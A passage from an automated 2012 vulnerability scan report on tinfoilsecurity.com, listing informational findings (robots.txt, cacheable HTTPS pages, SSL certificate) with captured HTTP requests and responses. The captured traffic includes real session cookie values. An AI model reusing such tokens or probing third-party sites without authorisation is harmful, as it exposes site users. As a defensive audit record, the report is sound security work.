X-Request-Id: df84981a9ec4dbfd1ce7adc10d15e2e9
X-Runtime: 0.015263
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 11546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<a href="mailto:support@tinfoilsecurity.com">
...[SNIP]...

6. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.

Request

GET /robots.txt HTTP/1.0
Host: www.tinfoilsecurity.com

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: text/plain
Date: Thu, 27 Sep 2012 17:37:46 GMT
Last-Modified: Thu, 27 Sep 2012 14:39:08 GMT
Server: thin 1.4.1 codename Chromeo
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Content-Digest: 7d7de849031f7519119cca7cc813c693ae3f6a56
X-Rack-Cache: stale, valid, store
Content-Length: 204
Connection: Close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

7. Cacheable HTTPS response  previous  next
There are 5 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


7.1. https://www.tinfoilsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Request

GET / HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:37:45 GMT
Etag: "65d9ae7a20e5be352e8b33e25c8811de"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 6adfef98b7981db6fd057ca672fe1eca
X-Runtime: 0.018001
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 11144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

7.2. https://www.tinfoilsecurity.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /about

Request

GET /about HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/tour
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:17 GMT
Etag: "f1f3a1b178b3c15e9cc0e24eb6f50455"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 39a5948540de9cddfd7e80d6c8338644
X-Runtime: 0.010876
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

7.3. https://www.tinfoilsecurity.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /pricing

Request

GET /pricing HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:31 GMT
Etag: "9427bd937c3b36e992fb734472abf075"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 7aa5b9bd6c008905e3fc38dc90588ea1
X-Runtime: 0.025884
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 10868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

7.4. https://www.tinfoilsecurity.com/tour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /tour

Request

GET /tour HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgphbGVydFQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIh9JbnZhbGlkIGVtYWlsIG9yIHBhc3N3b3JkLgY7AFQ6CUBub3dvOiRBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoTm93BjoLQGZsYXNoQAs%3D--019d16cebd48d4402740ffab9ba0a304a02e5fe4

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:14 GMT
Etag: "2b65d9ccecdb3c4eeecf419df65701e2"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 3c7e182debe17f882a12708f23ef8baf
X-Runtime: 0.016742
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 12429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

7.5. https://www.tinfoilsecurity.com/users/login  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /users/login

Request

GET /users/login HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:21 GMT
Etag: "bdbd73da655ef22ba7a891548f5f4bc5"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 82c30cdb46719cffa4a12564bef72a5a
X-Runtime: 0.023102
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

8. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.tinfoilsecurity.com, tinfoilsecurity.com
Issued by:  RapidSSL CA
Valid from:  Tue May 08 21:35:00 EDT 2012
Valid to:  Wed Jul 15 19:39:19 EDT 2015

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 17:45:05 EST 2010
Valid to:  Tue Feb 18 17:45:05 EST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Tue May 21 00:00:00 EDT 2002
Valid to:  Sat May 21 00:00:00 EDT 2022

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.Cx at Thu Sep 27 13:43:52 EDT 2012.